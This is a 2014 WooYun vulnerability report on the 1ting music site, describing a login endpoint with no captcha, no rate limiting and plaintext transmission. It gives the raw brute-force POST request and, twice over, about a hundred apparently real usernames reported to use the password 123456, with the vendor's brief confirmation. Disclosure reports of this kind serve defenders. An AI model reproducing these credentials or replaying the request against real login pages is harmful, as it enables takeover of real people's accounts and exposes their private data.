当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-082753
漏洞标题:
一听音乐网设计不当导致可爆破账号3000字典200用户
相关厂商:
一听音乐网
漏洞作者:
花心h
提交时间:
2014-11-10 13:25
修复时间:
2014-12-25 13:26
公开时间:
2014-12-25 13:26
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-20: 细节向核心白帽子及相关领域专家公开
2014-11-30: 细节向普通白帽子公开
2014-12-10: 细节向实习白帽子公开
2014-12-25: 细节向公众公开

简要描述:

还在充钱下音乐?!看看你的号都被人爆破啦!
求Rank到10!!让我升到实习白帽吧

详细说明:

接口:http://my.1ting.com/login
没有验证码没有限制,明文传输,
发送包:
POST /login HTTP/1.1
Host: my.1ting.com
Proxy-Connection: keep-alive
Origin: http://my.1ting.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://my.1ting.com/login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: CNZZDATA30022181=cnzz_eid%3D1759656400-1415539659-http%253A%252F%252Fwww.1ting.com%252F%26ntime%3D1415539659; Hm_lvt_32c12acc9a2efc3fa896bb3ebcd47ee7=1415541766; Hm_lpvt_32c12acc9a2efc3fa896bb3ebcd47ee7=1415541827
Content-Length: 45
user_login=12&user_passwd=123456&redirect=%2F

2.png


一大波账号证明:
josh 123456
ted 123456
lula 123456
jae 123456
dur 123456
dee 123456
ase 123456
xenia 123456
mac 123456
joanie 123456
car 123456
erda 123456
l3 123456
damon 123456
abbie 123456
laird 123456
hilton 123456
rich 123456
nell 123456
SMART 123456
remy 123456
mae 123456
tine 123456
dov 123456
opqw 123456
MFG 123456
bree 123456
pip 123456
adan 123456
merrie 123456
nike 123456
mimi 123456
klklkl 123456
megan 123456
shir 123456
koren 123456
ruth 123456
joey 123456
dana 123456
nobie 123456
amery 123456
mimi 123456
sam 123456
tutor 123456
hube 123456
zeb 123456
merle 123456
ardis 123456
960123 123456
arlen 123456
polly 123456
tedd 123456
minda 123456
lesley 123456
elke 123456
blake 123456
alla 123456
mnmn 123456
des 123456
nani 123456
rona 123456
min 123456
mmtt 123456
211211 123456
jim 123456
kiki 123456
denny 123456
fan 123456
ross 123456
barb 123456
alis 123456
boyboy 123456
770815 123456
andi 123456
errol 123456
roman 123456
taffy 123456
jason 123456
hazel 123456
751224 123456
mmmmmmm 123456
kali 123456
kayle 123456
karel 123456
addie 123456
751206 123456
rubin 123456
stefa 123456
toni 123456
jemima 123456
shalom 123456
winne 123456
vince 123456
weiq 123456
rad 123456
ivory 123456
huaiyong 123456
cat123 123456

漏洞证明:

接口:http://my.1ting.com/login
没有验证码没有限制,明文传输,
发送包:
POST /login HTTP/1.1
Host: my.1ting.com
Proxy-Connection: keep-alive
Origin: http://my.1ting.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://my.1ting.com/login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: CNZZDATA30022181=cnzz_eid%3D1759656400-1415539659-http%253A%252F%252Fwww.1ting.com%252F%26ntime%3D1415539659; Hm_lvt_32c12acc9a2efc3fa896bb3ebcd47ee7=1415541766; Hm_lpvt_32c12acc9a2efc3fa896bb3ebcd47ee7=1415541827
Content-Length: 45
user_login=12&user_passwd=123456&redirect=%2F

2.png


一大波账号证明:
josh 123456
ted 123456
lula 123456
jae 123456
dur 123456
dee 123456
ase 123456
xenia 123456
mac 123456
joanie 123456
car 123456
erda 123456
l3 123456
damon 123456
abbie 123456
laird 123456
hilton 123456
rich 123456
nell 123456
SMART 123456
remy 123456
mae 123456
tine 123456
dov 123456
opqw 123456
MFG 123456
bree 123456
pip 123456
adan 123456
merrie 123456
nike 123456
mimi 123456
klklkl 123456
megan 123456
shir 123456
koren 123456
ruth 123456
joey 123456
dana 123456
nobie 123456
amery 123456
mimi 123456
sam 123456
tutor 123456
hube 123456
zeb 123456
merle 123456
ardis 123456
960123 123456
arlen 123456
polly 123456
tedd 123456
minda 123456
lesley 123456
elke 123456
blake 123456
alla 123456
mnmn 123456
des 123456
nani 123456
rona 123456
min 123456
mmtt 123456
211211 123456
jim 123456
kiki 123456
denny 123456
fan 123456
ross 123456
barb 123456
alis 123456
boyboy 123456
770815 123456
andi 123456
errol 123456
roman 123456
taffy 123456
jason 123456
hazel 123456
751224 123456
mmmmmmm 123456
kali 123456
kayle 123456
karel 123456
addie 123456
751206 123456
rubin 123456
stefa 123456
toni 123456
jemima 123456
shalom 123456
winne 123456
vince 123456
weiq 123456
rad 123456
ivory 123456
huaiyong 123456
cat123 123456

修复方案:

版权声明:转载请注明来源 花心h@乌云

>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-11-10 13:35

厂商回复:

感谢提醒.

最新状态:

暂无